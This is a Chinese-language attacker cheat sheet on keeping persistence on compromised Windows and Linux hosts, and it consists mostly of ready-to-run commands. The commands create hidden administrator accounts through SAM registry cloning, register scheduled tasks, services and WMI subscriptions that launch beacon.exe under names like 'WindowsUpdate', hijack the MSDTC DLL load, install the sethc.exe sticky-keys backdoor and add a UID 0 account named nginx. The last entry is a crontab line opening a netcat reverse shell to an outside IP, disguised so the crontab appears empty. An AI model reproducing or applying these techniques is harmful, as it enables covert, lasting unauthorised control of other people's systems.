Windows权限维持

后门账户

隐藏账户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
net user ra6b1t$ w123456! /add                  #添加ra6b1t$隐藏用户
net localgroup administrators ra6b1t$ /add    #将ra6b1t$用户添加进管理员组中

#修改注册表
首先打开注册表编辑器,找到HKEY_LOCAL_MACHINE\SAM\SAM,点击右键,选择“权限”,将Administrator用户的权限,设置成“完全控制”,然后重新打开注册表,确保可以看到SAM路径下的文件。

输入命令:regedt 打开注册表
找到HKEY_LOCAL_MACHINE\SAM\SAM,点击右键,选择“权限”
将Administrator用户的权限,设置成“完全控制”
重新打开注册表,确保可以看到SAM路径下的文件
其次前往SAM/Domains/Account/Users/Names处,选择Administrator用户,在右侧的键值处可以找到对应的值如0x1f4,然后从左侧的Users目录下可以找到对应的文件。
然后从对应的000001F4文件中将键值对F的值复制出来。然后同理找到隐藏账户ra6b1t$所对应的文件,并将从Administrator文件中复制出来的F值粘贴进 ra6b1t$文件中。
最后将ra6b1t$和000003EB从注册表中右键导出
并删除ra6b1t$用户
net user ra6b1t$ /del
然后将刚刚导出的两个文件重新导入进注册表中即可实现ra6b1t用户的隐藏。

Guest账号后门

Guest 帐户是Windows系统内置的账户,默认情况下是未启用的。我们可以使用命令启用guest 账户实现权限维持。

1
2
3
net user guest /active:yes 启用guest用户
net user guest 123 设置密码为123
net localgroup administrators guest /add 加到管理员组

计划任务

1
schtasks /create /tn Google /sc minute /mo 1 /tr C:\Users\Administrator\Desktop\1.exe /ru system /f

注册服务后门

1
2
3
4
5
注册服务 
sc create "WindowsUpdate" binpath= "cmd /c start "C:\Users\Administrator\De sktop\beacon.exe""&&sc config "WindowsUpdate" start= auto&&net start Window sUpdate 
查询服务 
sc query WindowsUpdate 
删除服务 sc delete WindowsUpdate

MSDTC服务

Distributed Transaction Coordinator 是一个 Windows 服务,负责协调数据库 (SQL Server) 和 Web 服务器之间的事务。当此服务启动时,会尝试从 System32 加载以下三个 DLL 文件

oci.dll、SQLLib80.dll、xa80.dll

在默认的Windows安装中,System32文件夹中缺少oci.dll这个文件

生成恶意DLL命名为oci.dll放入C:\Windows\System32目录(需管理员权限)

1
2
3
sc stop msdtc
sc start msdtc
sc config msdtc start ="auto"

WMI

1
2
3
4
5
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="Windo wsUpdate", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win3 2_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 A ND TargetInstance.SystemUpTime < 260"

wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="WindowsUp", ExecutablePath="C:\Users\sqladmin\Desktop\beacon.exe"

wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREAT E Filter="__EventFilter.Name=\"WindowsUpdate\"", Consumer="CommandLineEvent Consumer.Name=\"WindowsUp\""

注册表

1
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v aa /t REG_SZ /d "C:\1.exe"

启动目录

image-20250722172714873

将⽊⻢样本放⼊系统的启动⽬录当中 ,可针对重启主机 。 C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Shift后门

image-20250722172626838

将C:windows/system32/sethc.exe替换为cmd.exe。 登陆界⾯连按5下Shift键,可调出cmd.exe

其他功能

屏幕键盘:C:\Windows\System32\osk.exe

放⼤镜:C:\Windows\System32\Magnify.exe

旁⽩:C:\Windows\System32\Narrator.exe

显示切换器 C:\Windows\System32\DisplaySwitch.exe

应⽤切换器:C:\Windows\System32\AtBroker.exe

驱动程序隐藏文件

Easy File Locker是一款文件保护工具,我们可以利用它设置文件/文件夹的权限。

image-20250722172453788

Linux权限维持

添加root后门账户

1
useradd -p `openssl passwd -1 -salt 'abc' abcabc111` -u 0 -o -g root -G root -s /bin/bash nginx

SSH公私钥

⽣成公私钥

1
ssh -keygen -b 4096 -t rsa

上传公钥到~/.ssh/id_rsa.pub

1
ssh-copy-id -i ~/.ssh/id_rsa.pub root@192.168.1.100

免密登录

1
ssh -p 22 root@192.168.1.100

计划任务

1
(crontab -l;printf "* * * * * nc -e /bin/bash 1.1.1.1 7777;/bin/bash -- noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -